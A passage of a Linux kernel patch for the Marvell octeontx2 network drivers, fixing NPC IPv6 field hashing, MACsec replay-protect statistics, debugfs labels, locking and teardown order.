+@@ -89,8 +91,9 @@ static int rvu_get_lmtaddr(struct rvu *rvu, u16 pcifunc,
+ 	pa = rvu_read64(rvu, BLKADDR_RVUM, RVU_AF_SMMU_TLN_FLIT0) >> 18;
+ 	pa &= GENMASK_ULL(39, 0);
+ 	*lmt_addr = (pa << 12) | (iova  & 0xFFF);
+-
+-	return 0;
++exit:
++	mutex_unlock(&rvu->rsrc_lock);
++	return err;
+ }
+ 
+ static int rvu_update_lmtaddr(struct rvu *rvu, u16 pcifunc, u64 lmt_addr)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+index 26cfa501f1a11..9533b1d929604 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_debugfs.c
+@@ -497,8 +497,9 @@ static int rvu_dbg_mcs_rx_secy_stats_display(struct seq_file *filp, void *unused
+ 			   stats.octet_validated_cnt);
+ 		seq_printf(filp, "secy%d: Pkts on disable port: %lld\n", secy_id,
+ 			   stats.pkt_port_disabled_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_badtag_cnt);
+-		seq_printf(filp, "secy%d: Octets validated: %lld\n", secy_id, stats.pkt_nosa_cnt);
++		seq_printf(filp, "secy%d: Pkts with badtag: %lld\n", secy_id, stats.pkt_badtag_cnt);
++		seq_printf(filp, "secy%d: Pkts with no SA(sectag.tci.c=0): %lld\n", secy_id,
++			   stats.pkt_nosa_cnt);
+ 		seq_printf(filp, "secy%d: Pkts with nosaerror: %lld\n", secy_id,
+ 			   stats.pkt_nosaerror_cnt);
+ 		seq_printf(filp, "secy%d: Tagged ctrl pkts: %lld\n", secy_id,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+index 006beb5cf98dd..952319453701b 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.c
+@@ -13,11 +13,6 @@
+ #include "rvu_npc_fs.h"
+ #include "rvu_npc_hash.h"
+ 
+-#define NPC_BYTESM		GENMASK_ULL(19, 16)
+-#define NPC_HDR_OFFSET		GENMASK_ULL(15, 8)
+-#define NPC_KEY_OFFSET		GENMASK_ULL(5, 0)
+-#define NPC_LDATA_EN		BIT_ULL(7)
+-
+ static const char * const npc_flow_names[] = {
+ 	[NPC_DMAC]	= "dmac",
+ 	[NPC_SMAC]	= "smac",
+@@ -442,6 +437,7 @@ done:
+ static void npc_scan_ldata(struct rvu *rvu, int blkaddr, u8 lid,
+ 			   u8 lt, u64 cfg, u8 intf)
+ {
++	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+ 	struct npc_mcam *mcam = &rvu->hw->mcam;
+ 	u8 hdr, key, nr_bytes, bit_offset;
+ 	u8 la_ltype, la_start;
+@@ -490,8 +486,21 @@ do {									       \
+ 	NPC_SCAN_HDR(NPC_SIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 12, 4);
+ 	NPC_SCAN_HDR(NPC_DIP_IPV4, NPC_LID_LC, NPC_LT_LC_IP, 16, 4);
+ 	NPC_SCAN_HDR(NPC_IPFRAG_IPV6, NPC_LID_LC, NPC_LT_LC_IP6_EXT, 6, 1);
+-	NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
+-	NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	if (rvu->hw->cap.npc_hash_extract) {
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][0])
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 4);
++		else
++			NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++
++		if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][1])
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 4);
++		else
++			NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	} else {
++		NPC_SCAN_HDR(NPC_SIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 8, 16);
++		NPC_SCAN_HDR(NPC_DIP_IPV6, NPC_LID_LC, NPC_LT_LC_IP6, 24, 16);
++	}
++
+ 	NPC_SCAN_HDR(NPC_SPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 0, 2);
+ 	NPC_SCAN_HDR(NPC_DPORT_UDP, NPC_LID_LD, NPC_LT_LD_UDP, 2, 2);
+ 	NPC_SCAN_HDR(NPC_SPORT_TCP, NPC_LID_LD, NPC_LT_LD_TCP, 0, 2);
+@@ -594,8 +603,7 @@ static int npc_scan_kex(struct rvu *rvu, int blkaddr, u8 intf)
+ 	 */
+ 	masked_cfg = cfg & NPC_EXACT_NIBBLE;
+ 	bitnr = NPC_EXACT_NIBBLE_START;
+-	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg,
+-			      NPC_EXACT_NIBBLE_START) {
++	for_each_set_bit_from(bitnr, (unsigned long *)&masked_cfg, NPC_EXACT_NIBBLE_END + 1) {
+ 		npc_scan_exact_result(mcam, bitnr, key_nibble, intf);
+ 		key_nibble++;
+ 	}
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+index bdd65ce56a32d..3f5c9042d10e7 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_fs.h
+@@ -9,6 +9,10 @@
+ #define __RVU_NPC_FS_H
+ 
+ #define IPV6_WORDS	4
++#define NPC_BYTESM	GENMASK_ULL(19, 16)
++#define NPC_HDR_OFFSET	GENMASK_ULL(15, 8)
++#define NPC_KEY_OFFSET	GENMASK_ULL(5, 0)
++#define NPC_LDATA_EN	BIT_ULL(7)
+ 
+ void npc_update_entry(struct rvu *rvu, enum key_fields type,
+ 		      struct mcam_entry *entry, u64 val_lo,
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+index f69102d20c903..b6e885263245c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.c
+@@ -78,42 +78,43 @@ static u32 rvu_npc_toeplitz_hash(const u64 *data, u64 *key, size_t data_bit_len,
+ 	return hash_out;
+ }
+ 
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx)
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx)
+ {
+ 	u64 hash_key[3];
+ 	u64 data_padded[2];
+ 	u32 field_hash;
+ 
+-	hash_key[0] = secret_key[1] << 31;
+-	hash_key[0] |= secret_key[2];
+-	hash_key[1] = secret_key[1] >> 33;
+-	hash_key[1] |= secret_key[0] << 31;
+-	hash_key[2] = secret_key[0] >> 33;
++	hash_key[0] = rsp.secret_key[1] << 31;
++	hash_key[0] |= rsp.secret_key[2];
++	hash_key[1] = rsp.secret_key[1] >> 33;
++	hash_key[1] |= rsp.secret_key[0] << 31;
++	hash_key[2] = rsp.secret_key[0] >> 33;
+ 
+-	data_padded[0] = mkex_hash->hash_mask[intf][hash_idx][0] & ldata[0];
+-	data_padded[1] = mkex_hash->hash_mask[intf][hash_idx][1] & ldata[1];
++	data_padded[0] = rsp.hash_mask[intf][hash_idx][0] & ldata[0];
++	data_padded[1] = rsp.hash_mask[intf][hash_idx][1] & ldata[1];
+ 	field_hash = rvu_npc_toeplitz_hash(data_padded, hash_key, 128, 159);
+ 
+-	field_hash &= mkex_hash->hash_ctrl[intf][hash_idx] >> 32;
+-	field_hash |= mkex_hash->hash_ctrl[intf][hash_idx];
++	field_hash &= FIELD_GET(GENMASK(63, 32), rsp.hash_ctrl[intf][hash_idx]);
++	field_hash += FIELD_GET(GENMASK(31, 0), rsp.hash_ctrl[intf][hash_idx]);
+ 	return field_hash;
+ }
+ 
+-static u64 npc_update_use_hash(int lt, int ld)
++static u64 npc_update_use_hash(struct rvu *rvu, int blkaddr,
++			       u8 intf, int lid, int lt, int ld)
+ {
+-	u64 cfg = 0;
+-
+-	switch (lt) {
+-	case NPC_LT_LC_IP6:
+-		/* Update use_hash(bit-20) and bytesm1 (bit-16:19)
+-		 * in KEX_LD_CFG
+-		 */
+-		cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
+-					  ld ? 0x8 : 0x18,
+-					  0x1, 0x0, 0x10);
+-		break;
+-	}
++	u8 hdr, key;
++	u64 cfg;
++
++	cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_LIDX_LTX_LDX_CFG(intf, lid, lt, ld));
++	hdr = FIELD_GET(NPC_HDR_OFFSET, cfg);
++	key = FIELD_GET(NPC_KEY_OFFSET, cfg);
++
++	/* Update use_hash(bit-20) to 'true' and
++	 * bytesm1(bit-16:19) to '0x3' in KEX_LD_CFG
++	 */
++	cfg = KEX_LD_CFG_USE_HASH(0x1, 0x03,
++				  hdr, 0x1, 0x0, key);
+ 
+ 	return cfg;
+ }
+@@ -132,12 +133,13 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++) {
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -149,6 +151,8 @@ static void npc_program_mkex_hash_rx(struct rvu *rvu, int blkaddr,
+ 							     mkex_hash->hash_mask[intf][ld][1]);
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
++
++					hash_cnt++;
+ 				}
+ 			}
+ 		}
+@@ -169,12 +173,13 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 		for (lt = 0; lt < NPC_MAX_LT; lt++) {
+ 			for (ld = 0; ld < NPC_MAX_LD; ld++)
+ 				if (mkex_hash->lid_lt_ld_hash_en[intf][lid][lt][ld]) {
+-					u64 cfg = npc_update_use_hash(lt, ld);
++					u64 cfg;
+ 
+-					hash_cnt++;
+ 					if (hash_cnt == NPC_MAX_HASH)
+ 						return;
+ 
++					cfg = npc_update_use_hash(rvu, blkaddr,
++								  intf, lid, lt, ld);
+ 					/* Set updated KEX configuration */
+ 					SET_KEX_LD(intf, lid, lt, ld, cfg);
+ 					/* Set HASH configuration */
+@@ -187,8 +192,6 @@ static void npc_program_mkex_hash_tx(struct rvu *rvu, int blkaddr,
+ 					SET_KEX_LD_HASH_CTRL(intf, ld,
+ 							     mkex_hash->hash_ctrl[intf][ld]);
+ 					hash_cnt++;
+-					if (hash_cnt == NPC_MAX_HASH)
+-						return;
+ 				}
+ 		}
+ 	}
+@@ -242,8 +245,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask)
+ {
+ 	struct npc_mcam_kex_hash *mkex_hash = rvu->kpu.mkex_hash;
+-	struct npc_get_secret_key_req req;
+-	struct npc_get_secret_key_rsp rsp;
++	struct npc_get_field_hash_info_req req;
++	struct npc_get_field_hash_info_rsp rsp;
+ 	u64 ldata[2], cfg;
+ 	u32 field_hash;
+ 	u8 hash_idx;
+@@ -254,7 +257,7 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ 
+ 	req.intf = intf;
+-	rvu_mbox_handler_npc_get_secret_key(rvu, &req, &rsp);
++	rvu_mbox_handler_npc_get_field_hash_info(rvu, &req, &rsp);
+ 
+ 	for (hash_idx = 0; hash_idx < NPC_MAX_HASH; hash_idx++) {
+ 		cfg = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_CFG(intf, hash_idx));
+@@ -270,44 +273,45 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 				 * is hashed to 32 bit value.
+ 				 */
+ 				case NPC_LT_LC_IP6:
+-					if (features & BIT_ULL(NPC_SIP_IPV6)) {
++					/* ld[0] == hash_idx[0] == Source IPv6
++					 * ld[1] == hash_idx[1] == Destination IPv6
++					 */
++					if ((features & BIT_ULL(NPC_SIP_IPV6)) && !hash_idx) {
+ 						u32 src_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(src_ip, pkt->ip6src, IPV6_WORDS);
+-						ldata[0] = (u64)src_ip[0] << 32 | src_ip[1];
+-						ldata[1] = (u64)src_ip[2] << 32 | src_ip[3];
++						ldata[1] = (u64)src_ip[0] << 32 | src_ip[1];
++						ldata[0] = (u64)src_ip[2] << 32 | src_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_SIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6src, &pkt->ip6src,
+ 						       sizeof(pkt->ip6src));
+ 						memcpy(&omask->ip6src, &mask->ip6src,
+ 						       sizeof(mask->ip6src));
+-						break;
+-					}
+-
+-					if (features & BIT_ULL(NPC_DIP_IPV6)) {
++					} else if ((features & BIT_ULL(NPC_DIP_IPV6)) && hash_idx) {
+ 						u32 dst_ip[IPV6_WORDS];
+ 
+ 						be32_to_cpu_array(dst_ip, pkt->ip6dst, IPV6_WORDS);
+-						ldata[0] = (u64)dst_ip[0] << 32 | dst_ip[1];
+-						ldata[1] = (u64)dst_ip[2] << 32 | dst_ip[3];
++						ldata[1] = (u64)dst_ip[0] << 32 | dst_ip[1];
++						ldata[0] = (u64)dst_ip[2] << 32 | dst_ip[3];
+ 						field_hash = npc_field_hash_calc(ldata,
+-										 mkex_hash,
+-										 rsp.secret_key,
++										 rsp,
+ 										 intf,
+ 										 hash_idx);
+ 						npc_update_entry(rvu, NPC_DIP_IPV6, entry,
+-								 field_hash, 0, 32, 0, intf);
++								 field_hash, 0,
++								 GENMASK(31, 0), 0, intf);
+ 						memcpy(&opkt->ip6dst, &pkt->ip6dst,
+ 						       sizeof(pkt->ip6dst));
+ 						memcpy(&omask->ip6dst, &mask->ip6dst,
+ 						       sizeof(mask->ip6dst));
+ 					}
++
+ 					break;
+ 				}
+ 			}
+@@ -315,13 +319,13 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 	}
+ }
+ 
+-int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+-					struct npc_get_secret_key_req *req,
+-					struct npc_get_secret_key_rsp *rsp)
++int rvu_mbox_handler_npc_get_field_hash_info(struct rvu *rvu,
++					     struct npc_get_field_hash_info_req *req,
++					     struct npc_get_field_hash_info_rsp *rsp)
+ {
+ 	u64 *secret_key = rsp->secret_key;
+ 	u8 intf = req->intf;
+-	int blkaddr;
++	int i, j, blkaddr;
+ 
+ 	blkaddr = rvu_get_blkaddr(rvu, BLKTYPE_NPC, 0);
+ 	if (blkaddr < 0) {
+@@ -333,6 +337,19 @@ int rvu_mbox_handler_npc_get_secret_key(struct rvu *rvu,
+ 	secret_key[1] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY1(intf));
+ 	secret_key[2] = rvu_read64(rvu, blkaddr, NPC_AF_INTFX_SECRET_KEY2(intf));
+ 
++	for (i = 0; i < NPC_MAX_HASH; i++) {
++		for (j = 0; j < NPC_MAX_HASH_MASK; j++) {
++			rsp->hash_mask[NIX_INTF_RX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_RX, i, j);
++			rsp->hash_mask[NIX_INTF_TX][i][j] =
++				GET_KEX_LD_HASH_MASK(NIX_INTF_TX, i, j);
++		}
++	}
++
++	for (i = 0; i < NPC_MAX_INTF; i++)
++		for (j = 0; j < NPC_MAX_HASH; j++)
++			rsp->hash_ctrl[i][j] = GET_KEX_LD_HASH_CTRL(i, j);
++
+ 	return 0;
+ }
+ 
+@@ -1878,9 +1895,9 @@ int rvu_npc_exact_init(struct rvu *rvu)
+ 	rvu->hw->table = table;
+ 
+ 	/* Read table size, ways and depth */
+-	table->mem_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 	table->mem_table.ways = FIELD_GET(GENMASK_ULL(19, 16), npc_const3);
+-	table->cam_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->mem_table.depth = FIELD_GET(GENMASK_ULL(15, 0), npc_const3);
++	table->cam_table.depth = FIELD_GET(GENMASK_ULL(31, 24), npc_const3);
+ 
+ 	dev_dbg(rvu->dev, "%s: NPC exact match 4way_2k table(ways=%d, depth=%d)\n",
+ 		__func__,  table->mem_table.ways, table->cam_table.depth);
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+index 3efeb09c58dec..a1c3d987b8044 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_npc_hash.h
+@@ -31,6 +31,12 @@
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx), cfg)
+ 
++#define GET_KEX_LD_HASH_CTRL(intf, ld)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld))
++
++#define GET_KEX_LD_HASH_MASK(intf, ld, mask_idx)	\
++	rvu_read64(rvu, blkaddr, NPC_AF_INTFX_HASHX_MASKX(intf, ld, mask_idx))
++
+ #define SET_KEX_LD_HASH_CTRL(intf, ld, cfg) \
+ 	rvu_write64(rvu, blkaddr,	\
+ 		    NPC_AF_INTFX_HASHX_RESULT_CTRL(intf, ld), cfg)
+@@ -56,8 +62,8 @@ void npc_update_field_hash(struct rvu *rvu, u8 intf,
+ 			   struct flow_msg *omask);
+ void npc_config_secret_key(struct rvu *rvu, int blkaddr);
+ void npc_program_mkex_hash(struct rvu *rvu, int blkaddr);
+-u32 npc_field_hash_calc(u64 *ldata, struct npc_mcam_kex_hash *mkex_hash,
+-			u64 *secret_key, u8 intf, u8 hash_idx);
++u32 npc_field_hash_calc(u64 *ldata, struct npc_get_field_hash_info_rsp rsp,
++			u8 intf, u8 hash_idx);
+ 
+ static struct npc_mcam_kex_hash npc_mkex_hash_default __maybe_unused = {
+ 	.lid_lt_ld_hash_en = {
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+index 9ec5f38d38a84..a487a98eac88c 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/cn10k_macsec.c
+@@ -9,6 +9,7 @@
+ #include <net/macsec.h>
+ #include "otx2_common.h"
+ 
++#define MCS_TCAM0_MAC_DA_MASK		GENMASK_ULL(47, 0)
+ #define MCS_TCAM0_MAC_SA_MASK		GENMASK_ULL(63, 48)
+ #define MCS_TCAM1_MAC_SA_MASK		GENMASK_ULL(31, 0)
+ #define MCS_TCAM1_ETYPE_MASK		GENMASK_ULL(47, 32)
+@@ -149,11 +150,20 @@ static void cn10k_mcs_free_rsrc(struct otx2_nic *pfvf, enum mcs_direction dir,
+ 				enum mcs_rsrc_type type, u16 hw_rsrc_id,
+ 				bool all)
+ {
++	struct mcs_clear_stats *clear_req;
+ 	struct mbox *mbox = &pfvf->mbox;
+ 	struct mcs_free_rsrc_req *req;
+ 
+ 	mutex_lock(&mbox->lock);
+ 
++	clear_req = otx2_mbox_alloc_msg_mcs_clear_stats(mbox);
++	if (!clear_req)
++		goto fail;
++
++	clear_req->id = hw_rsrc_id;
++	clear_req->type = type;
++	clear_req->dir = dir;
++
+ 	req = otx2_mbox_alloc_msg_mcs_free_resources(mbox);
+ 	if (!req)
+ 		goto fail;
+@@ -237,8 +247,10 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 				     struct cn10k_mcs_rxsc *rxsc, u8 hw_secy_id)
+ {
+ 	struct macsec_rx_sc *sw_rx_sc = rxsc->sw_rxsc;
++	struct macsec_secy *secy = rxsc->sw_secy;
+ 	struct mcs_flowid_entry_write_req *req;
+ 	struct mbox *mbox = &pfvf->mbox;
++	u64 mac_da;
+ 	int ret;
+ 
+ 	mutex_lock(&mbox->lock);
+@@ -249,11 +261,16 @@ static int cn10k_mcs_write_rx_flowid(struct otx2_nic *pfvf,
+ 		goto fail;
+ 	}
+ 
++	mac_da = ether_addr_to_u64(secy->netdev->dev_addr);
++
++	req->data[0] = FIELD_PREP(MCS_TCAM0_MAC_DA_MASK, mac_da);
++	req->mask[0] = ~0ULL;
++	req->mask[0] = ~MCS_TCAM0_MAC_DA_MASK;
++
+ 	req->data[1] = FIELD_PREP(MCS_TCAM1_ETYPE_MASK, ETH_P_MACSEC);
+ 	req->mask[1] = ~0ULL;
+ 	req->mask[1] &= ~MCS_TCAM1_ETYPE_MASK;
+ 
+-	req->mask[0] = ~0ULL;
+ 	req->mask[2] = ~0ULL;
+ 	req->mask[3] = ~0ULL;
+ 
+@@ -997,7 +1014,7 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 
+ 	/* Check if sync is really needed */
+ 	if (secy->validate_frames == txsc->last_validate_frames &&
+-	    secy->protect_frames == txsc->last_protect_frames)
++	    secy->replay_protect == txsc->last_replay_protect)
+ 		return;
+ 
+ 	cn10k_mcs_secy_stats(pfvf, txsc->hw_secy_id_rx, &rx_rsp, MCS_RX, true);
+@@ -1019,19 +1036,19 @@ static void cn10k_mcs_sync_stats(struct otx2_nic *pfvf, struct macsec_secy *secy
+ 		rxsc->stats.InPktsInvalid += sc_rsp.pkt_invalid_cnt;
+ 		rxsc->stats.InPktsNotValid += sc_rsp.pkt_notvalid_cnt;
+ 
+-		if (txsc->last_protect_frames)
++		if (txsc->last_replay_protect)
+ 			rxsc->stats.InPktsLate += sc_rsp.pkt_late_cnt;
+ 		else
+ 			rxsc->stats.InPktsDelayed += sc_rsp.pkt_late_cnt;
+ 
+-		if (txsc->last_validate_frames == MACSEC_VALIDATE_CHECK)
++		if (txsc->last_validate_frames == MACSEC_VALIDATE_DISABLED)
+ 			rxsc->stats.InPktsUnchecked += sc_rsp.pkt_unchecked_cnt;
+ 		else
+ 			rxsc->stats.InPktsOK += sc_rsp.pkt_unchecked_cnt;
+ 	}
+ 
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ }
+ 
+ static int cn10k_mdo_open(struct macsec_context *ctx)
+@@ -1100,7 +1117,7 @@ static int cn10k_mdo_add_secy(struct macsec_context *ctx)
+ 	txsc->sw_secy = secy;
+ 	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+ 	txsc->last_validate_frames = secy->validate_frames;
+-	txsc->last_protect_frames = secy->protect_frames;
++	txsc->last_replay_protect = secy->replay_protect;
+ 
+ 	list_add(&txsc->entry, &cfg->txsc_list);
+ 
+@@ -1117,6 +1134,7 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	struct macsec_secy *secy = ctx->secy;
+ 	struct macsec_tx_sa *sw_tx_sa;
+ 	struct cn10k_mcs_txsc *txsc;
++	bool active;
+ 	u8 sa_num;
+ 	int err;
+ 
+@@ -1124,15 +1142,19 @@ static int cn10k_mdo_upd_secy(struct macsec_context *ctx)
+ 	if (!txsc)
+ 		return -ENOENT;
+ 
+-	txsc->encoding_sa = secy->tx_sc.encoding_sa;
+-
+-	sa_num = txsc->encoding_sa;
+-	sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++	/* Encoding SA got changed */
++	if (txsc->encoding_sa != secy->tx_sc.encoding_sa) {
++		txsc->encoding_sa = secy->tx_sc.encoding_sa;
++		sa_num = txsc->encoding_sa;
++		sw_tx_sa = rcu_dereference_bh(secy->tx_sc.sa[sa_num]);
++		active = sw_tx_sa ? sw_tx_sa->active : false;
++		cn10k_mcs_link_tx_sa2sc(pfvf, secy, txsc, sa_num, active);
++	}
+ 
+ 	if (netif_running(secy->netdev)) {
+ 		cn10k_mcs_sync_stats(pfvf, secy, txsc);
+ 
+-		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, sw_tx_sa, sa_num);
++		err = cn10k_mcs_secy_tx_cfg(pfvf, secy, txsc, NULL, 0);
+ 		if (err)
+ 			return err;
+ 	}
+@@ -1521,12 +1543,12 @@ static int cn10k_mdo_get_rx_sc_stats(struct macsec_context *ctx)
+ 	rxsc->stats.InPktsInvalid += rsp.pkt_invalid_cnt;
+ 	rxsc->stats.InPktsNotValid += rsp.pkt_notvalid_cnt;
+ 
+-	if (secy->protect_frames)
++	if (secy->replay_protect)
+ 		rxsc->stats.InPktsLate += rsp.pkt_late_cnt;
+ 	else
+ 		rxsc->stats.InPktsDelayed += rsp.pkt_late_cnt;
+ 
+-	if (secy->validate_frames == MACSEC_VALIDATE_CHECK)
++	if (secy->validate_frames == MACSEC_VALIDATE_DISABLED)
+ 		rxsc->stats.InPktsUnchecked += rsp.pkt_unchecked_cnt;
+ 	else
+ 		rxsc->stats.InPktsOK += rsp.pkt_unchecked_cnt;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+index 3d22cc6a2804a..0c8fc66ade82d 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_common.h
+@@ -335,11 +335,11 @@ struct otx2_flow_config {
+ #define OTX2_PER_VF_VLAN_FLOWS	2 /* Rx + Tx per VF */
+ #define OTX2_VF_VLAN_RX_INDEX	0
+ #define OTX2_VF_VLAN_TX_INDEX	1
+-	u16			max_flows;
+-	u8			dmacflt_max_flows;
+ 	u32			*bmap_to_dmacindex;
+ 	unsigned long		*dmacflt_bmap;
+ 	struct list_head	flow_list;
++	u32			dmacflt_max_flows;
++	u16                     max_flows;
+ };
+ 
+ struct otx2_tc_info {
+@@ -389,7 +389,7 @@ struct cn10k_mcs_txsc {
+ 	struct cn10k_txsc_stats stats;
+ 	struct list_head entry;
+ 	enum macsec_validation_type last_validate_frames;
+-	bool last_protect_frames;
++	bool last_replay_protect;
+ 	u16 hw_secy_id_tx;
+ 	u16 hw_secy_id_rx;
+ 	u16 hw_flow_id;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+index c1ea60bc2630e..23eee2b3d4081 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_pf.c
+@@ -1835,13 +1835,22 @@ int otx2_open(struct net_device *netdev)
+ 		otx2_dmacflt_reinstall_flows(pf);
+ 
+ 	err = otx2_rxtx_enable(pf, true);
+-	if (err)
++	/* If a mbox communication error happens at this point then interface
++	 * will end up in a state such that it is in down state but hardware
++	 * mcam entries are enabled to receive the packets. Hence disable the
++	 * packet I/O.
++	 */
++	if (err == EIO)
++		goto err_disable_rxtx;
++	else if (err)
+ 		goto err_tx_stop_queues;
+ 
+ 	otx2_do_set_rx_mode(pf);
+ 
+ 	return 0;
+ 
++err_disable_rxtx:
++	otx2_rxtx_enable(pf, false);
+ err_tx_stop_queues:
+ 	netif_tx_stop_all_queues(netdev);
+ 	netif_carrier_off(netdev);
+@@ -3069,8 +3078,6 @@ static void otx2_remove(struct pci_dev *pdev)
+ 		otx2_config_pause_frm(pf);
+ 	}
+ 
+-	cn10k_mcs_free(pf);
+-
+ #ifdef CONFIG_DCB
+ 	/* Disable PFC config */
+ 	if (pf->pfc_en) {
+@@ -3084,6 +3091,7 @@ static void otx2_remove(struct pci_dev *pdev)
+ 
+ 	otx2_unregister_dl(pf);
+ 	unregister_netdev(netdev);
++	cn10k_mcs_free(pf);
+ 	otx2_sriov_disable(pf->pdev);
+ 	otx2_sriov_vfcfg_cleanup(pf);
+ 	if (pf->otx2_wq)
+diff --git a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+index 044cc211424ed..8392f63e433fc 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
++++ b/drivers/net/ethernet/marvell/octeontx2/nic/otx2_tc.c
+@@ -544,7 +544,7 @@ static int otx2_tc_prepare_flow(struct otx2_nic *nic, struct otx2_tc_flow *node,
